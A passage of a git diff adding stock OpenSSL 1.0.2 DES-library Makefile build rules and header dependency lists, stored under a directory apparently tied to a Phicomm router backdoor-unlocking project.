+	rm -f *.s *.o *.obj des lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+cbc_cksm.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+cbc_cksm.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+cbc_cksm.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+cbc_cksm.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cbc_cksm.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+cbc_cksm.o: cbc_cksm.c des_locl.h
+cbc_enc.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+cbc_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+cbc_enc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+cbc_enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cbc_enc.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+cbc_enc.o: cbc_enc.c des_locl.h ncbc_enc.c
+cfb64ede.o: ../../e_os.h ../../include/openssl/des.h
+cfb64ede.o: ../../include/openssl/des_old.h ../../include/openssl/e_os2.h
+cfb64ede.o: ../../include/openssl/opensslconf.h
+cfb64ede.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+cfb64ede.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cfb64ede.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+cfb64ede.o: cfb64ede.c des_locl.h
+cfb64enc.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+cfb64enc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+cfb64enc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+cfb64enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cfb64enc.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+cfb64enc.o: cfb64enc.c des_locl.h
+cfb_enc.o: ../../e_os.h ../../include/openssl/des.h
+cfb_enc.o: ../../include/openssl/des_old.h ../../include/openssl/e_os2.h
+cfb_enc.o: ../../include/openssl/opensslconf.h ../../include/openssl/ossl_typ.h
+cfb_enc.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+cfb_enc.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+cfb_enc.o: ../../include/openssl/ui_compat.h cfb_enc.c des_locl.h
+des_enc.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+des_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+des_enc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+des_enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+des_enc.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+des_enc.o: des_enc.c des_locl.h ncbc_enc.c spr.h
+des_old.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+des_old.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+des_old.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+des_old.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+des_old.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+des_old.o: ../../include/openssl/ui_compat.h des_old.c
+des_old2.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+des_old2.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+des_old2.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+des_old2.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+des_old2.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+des_old2.o: ../../include/openssl/ui_compat.h des_old2.c
+ecb3_enc.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+ecb3_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+ecb3_enc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+ecb3_enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ecb3_enc.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+ecb3_enc.o: des_locl.h ecb3_enc.c
+ecb_enc.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+ecb_enc.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+ecb_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+ecb_enc.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ecb_enc.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ecb_enc.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+ecb_enc.o: ../../include/openssl/ui_compat.h des_locl.h des_ver.h ecb_enc.c
+ede_cbcm_enc.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+ede_cbcm_enc.o: ../../include/openssl/e_os2.h
+ede_cbcm_enc.o: ../../include/openssl/opensslconf.h
+ede_cbcm_enc.o: ../../include/openssl/ossl_typ.h
+ede_cbcm_enc.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ede_cbcm_enc.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+ede_cbcm_enc.o: ../../include/openssl/ui_compat.h des_locl.h ede_cbcm_enc.c
+enc_read.o: ../../e_os.h ../../include/openssl/bio.h
+enc_read.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+enc_read.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+enc_read.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+enc_read.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+enc_read.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+enc_read.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+enc_read.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+enc_read.o: ../../include/openssl/ui_compat.h ../cryptlib.h des_locl.h
+enc_read.o: enc_read.c
+enc_writ.o: ../../e_os.h ../../include/openssl/bio.h
+enc_writ.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+enc_writ.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+enc_writ.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+enc_writ.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+enc_writ.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+enc_writ.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+enc_writ.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+enc_writ.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+enc_writ.o: ../cryptlib.h des_locl.h enc_writ.c
+fcrypt.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+fcrypt.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+fcrypt.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+fcrypt.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+fcrypt.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+fcrypt.o: des_locl.h fcrypt.c
+fcrypt_b.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+fcrypt_b.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+fcrypt_b.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+fcrypt_b.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+fcrypt_b.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+fcrypt_b.o: des_locl.h fcrypt_b.c
+ofb64ede.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+ofb64ede.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+ofb64ede.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+ofb64ede.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ofb64ede.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+ofb64ede.o: des_locl.h ofb64ede.c
+ofb64enc.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+ofb64enc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+ofb64enc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+ofb64enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ofb64enc.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+ofb64enc.o: des_locl.h ofb64enc.c
+ofb_enc.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+ofb_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+ofb_enc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+ofb_enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ofb_enc.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+ofb_enc.o: des_locl.h ofb_enc.c
+pcbc_enc.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+pcbc_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+pcbc_enc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+pcbc_enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pcbc_enc.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+pcbc_enc.o: des_locl.h pcbc_enc.c
+qud_cksm.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+qud_cksm.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+qud_cksm.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+qud_cksm.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+qud_cksm.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+qud_cksm.o: des_locl.h qud_cksm.c
+rand_key.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+rand_key.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+rand_key.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+rand_key.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rand_key.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+rand_key.o: ../../include/openssl/ui_compat.h rand_key.c
+read2pwd.o: ../../include/openssl/crypto.h ../../include/openssl/des.h
+read2pwd.o: ../../include/openssl/des_old.h ../../include/openssl/e_os2.h
+read2pwd.o: ../../include/openssl/opensslconf.h
+read2pwd.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+read2pwd.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+read2pwd.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+read2pwd.o: ../../include/openssl/ui_compat.h read2pwd.c
+rpc_enc.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+rpc_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+rpc_enc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+rpc_enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rpc_enc.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+rpc_enc.o: des_locl.h des_ver.h rpc_des.h rpc_enc.c
+set_key.o: ../../include/openssl/crypto.h ../../include/openssl/des.h
+set_key.o: ../../include/openssl/des_old.h ../../include/openssl/e_os2.h
+set_key.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+set_key.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+set_key.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+set_key.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+set_key.o: des_locl.h set_key.c
+str2key.o: ../../include/openssl/crypto.h ../../include/openssl/des.h
+str2key.o: ../../include/openssl/des_old.h ../../include/openssl/e_os2.h
+str2key.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+str2key.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+str2key.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+str2key.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+str2key.o: des_locl.h str2key.c
+xcbc_enc.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+xcbc_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+xcbc_enc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+xcbc_enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+xcbc_enc.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+xcbc_enc.o: des_locl.h xcbc_enc.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/Makefile.bak
new file mode 100644
index 0000000..060c647
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/Makefile.bak
@@ -0,0 +1,281 @@
+#
+# OpenSSL/crypto/des/Makefile
+#
+
+DIR=	des
+TOP=	../..
+CC=	cc
+CPP=	$(CC) -E
+INCLUDES=-I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+RANLIB=		ranlib
+DES_ENC=	des_enc.o fcrypt_b.o
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+TEST=destest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=	cbc_cksm.c cbc_enc.c  cfb64enc.c cfb_enc.c  \
+	ecb3_enc.c ecb_enc.c  enc_read.c enc_writ.c \
+	fcrypt.c ofb64enc.c ofb_enc.c  pcbc_enc.c \
+	qud_cksm.c rand_key.c rpc_enc.c  set_key.c  \
+	des_enc.c fcrypt_b.c \
+	xcbc_enc.c \
+	str2key.c  cfb64ede.c ofb64ede.c ede_cbcm_enc.c des_old.c des_old2.c \
+	read2pwd.c
+
+LIBOBJ= set_key.o  ecb_enc.o  cbc_enc.o \
+	ecb3_enc.o cfb64enc.o cfb64ede.o cfb_enc.o  ofb64ede.o \
+	enc_read.o enc_writ.o ofb64enc.o \
+	ofb_enc.o  str2key.o  pcbc_enc.o qud_cksm.o rand_key.o \
+	${DES_ENC} \
+	fcrypt.o xcbc_enc.o rpc_enc.o  cbc_cksm.o \
+	ede_cbcm_enc.o des_old.o des_old2.o read2pwd.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= des.h des_old.h
+HEADER=	des_locl.h rpc_des.h spr.h des_ver.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+des: des.o cbc3_enc.o lib
+	$(CC) $(CFLAGS) -o des des.o cbc3_enc.o $(LIB)
+
+des_enc-sparc.S:	asm/des_enc.m4
+	m4 -B 8192 asm/des_enc.m4 > des_enc-sparc.S
+dest4-sparcv9.s:	asm/dest4-sparcv9.pl
+	$(PERL) asm/dest4-sparcv9.pl $(CFLAGS) > $@
+
+des-586.s:	asm/des-586.pl ../perlasm/x86asm.pl ../perlasm/cbc.pl
+	$(PERL) asm/des-586.pl $(PERLASM_SCHEME) $(CFLAGS) > $@
+crypt586.s:	asm/crypt586.pl ../perlasm/x86asm.pl ../perlasm/cbc.pl
+	$(PERL) asm/crypt586.pl $(PERLASM_SCHEME) $(CFLAGS) > $@
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+# We need to use force because 'install' matches 'INSTALL' on case
+# insensitive systems
+FRC.install:
+install: FRC.install
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj des lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+cbc_cksm.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+cbc_cksm.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+cbc_cksm.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+cbc_cksm.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cbc_cksm.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+cbc_cksm.o: cbc_cksm.c des_locl.h
+cbc_enc.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+cbc_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+cbc_enc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+cbc_enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cbc_enc.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+cbc_enc.o: cbc_enc.c des_locl.h ncbc_enc.c
+cfb64ede.o: ../../e_os.h ../../include/openssl/des.h
+cfb64ede.o: ../../include/openssl/des_old.h ../../include/openssl/e_os2.h
+cfb64ede.o: ../../include/openssl/opensslconf.h
+cfb64ede.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+cfb64ede.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cfb64ede.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+cfb64ede.o: cfb64ede.c des_locl.h
+cfb64enc.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+cfb64enc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+cfb64enc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+cfb64enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+cfb64enc.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+cfb64enc.o: cfb64enc.c des_locl.h
+cfb_enc.o: ../../e_os.h ../../include/openssl/des.h
+cfb_enc.o: ../../include/openssl/des_old.h ../../include/openssl/e_os2.h
+cfb_enc.o: ../../include/openssl/opensslconf.h ../../include/openssl/ossl_typ.h
+cfb_enc.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+cfb_enc.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+cfb_enc.o: ../../include/openssl/ui_compat.h cfb_enc.c des_locl.h
+des_enc.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+des_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+des_enc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+des_enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+des_enc.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+des_enc.o: des_enc.c des_locl.h ncbc_enc.c spr.h
+des_old.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+des_old.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+des_old.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+des_old.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+des_old.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+des_old.o: ../../include/openssl/ui_compat.h des_old.c
+des_old2.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+des_old2.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+des_old2.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+des_old2.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+des_old2.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+des_old2.o: ../../include/openssl/ui_compat.h des_old2.c
+ecb3_enc.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+ecb3_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+ecb3_enc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+ecb3_enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ecb3_enc.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+ecb3_enc.o: des_locl.h ecb3_enc.c
+ecb_enc.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+ecb_enc.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+ecb_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+ecb_enc.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+ecb_enc.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ecb_enc.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+ecb_enc.o: ../../include/openssl/ui_compat.h des_locl.h des_ver.h ecb_enc.c
+ede_cbcm_enc.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+ede_cbcm_enc.o: ../../include/openssl/e_os2.h
+ede_cbcm_enc.o: ../../include/openssl/opensslconf.h
+ede_cbcm_enc.o: ../../include/openssl/ossl_typ.h
+ede_cbcm_enc.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+ede_cbcm_enc.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+ede_cbcm_enc.o: ../../include/openssl/ui_compat.h des_locl.h ede_cbcm_enc.c
+enc_read.o: ../../e_os.h ../../include/openssl/bio.h
+enc_read.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+enc_read.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+enc_read.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+enc_read.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+enc_read.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+enc_read.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+enc_read.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+enc_read.o: ../../include/openssl/ui_compat.h ../cryptlib.h des_locl.h
+enc_read.o: enc_read.c
+enc_writ.o: ../../e_os.h ../../include/openssl/bio.h
+enc_writ.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+enc_writ.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+enc_writ.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+enc_writ.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+enc_writ.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+enc_writ.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+enc_writ.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+enc_writ.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+enc_writ.o: ../cryptlib.h des_locl.h enc_writ.c
+fcrypt.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+fcrypt.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+fcrypt.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+fcrypt.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+fcrypt.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+fcrypt.o: des_locl.h fcrypt.c
+fcrypt_b.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+fcrypt_b.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+fcrypt_b.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+fcrypt_b.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+fcrypt_b.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+fcrypt_b.o: des_locl.h fcrypt_b.c
+ofb64ede.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+ofb64ede.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+ofb64ede.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+ofb64ede.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ofb64ede.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+ofb64ede.o: des_locl.h ofb64ede.c
+ofb64enc.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+ofb64enc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+ofb64enc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+ofb64enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ofb64enc.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+ofb64enc.o: des_locl.h ofb64enc.c
+ofb_enc.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+ofb_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+ofb_enc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+ofb_enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+ofb_enc.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+ofb_enc.o: des_locl.h ofb_enc.c
+pcbc_enc.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+pcbc_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+pcbc_enc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+pcbc_enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pcbc_enc.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+pcbc_enc.o: des_locl.h pcbc_enc.c
+qud_cksm.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+qud_cksm.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+qud_cksm.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+qud_cksm.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+qud_cksm.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+qud_cksm.o: des_locl.h qud_cksm.c
+rand_key.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+rand_key.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+rand_key.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+rand_key.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+rand_key.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+rand_key.o: ../../include/openssl/ui_compat.h rand_key.c
+read2pwd.o: ../../include/openssl/crypto.h ../../include/openssl/des.h
+read2pwd.o: ../../include/openssl/des_old.h ../../include/openssl/e_os2.h
+read2pwd.o: ../../include/openssl/opensslconf.h
+read2pwd.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+read2pwd.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+read2pwd.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+read2pwd.o: ../../include/openssl/ui_compat.h read2pwd.c
+rpc_enc.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+rpc_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+rpc_enc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+rpc_enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+rpc_enc.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+rpc_enc.o: des_locl.h des_ver.h rpc_des.h rpc_enc.c
+set_key.o: ../../include/openssl/crypto.h ../../include/openssl/des.h
+set_key.o: ../../include/openssl/des_old.h ../../include/openssl/e_os2.h
+set_key.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+set_key.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+set_key.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+set_key.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+set_key.o: des_locl.h set_key.c
+str2key.o: ../../include/openssl/crypto.h ../../include/openssl/des.h
+str2key.o: ../../include/openssl/des_old.h ../../include/openssl/e_os2.h
+str2key.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+str2key.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+str2key.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+str2key.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+str2key.o: des_locl.h str2key.c
+xcbc_enc.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+xcbc_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+xcbc_enc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+xcbc_enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+xcbc_enc.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
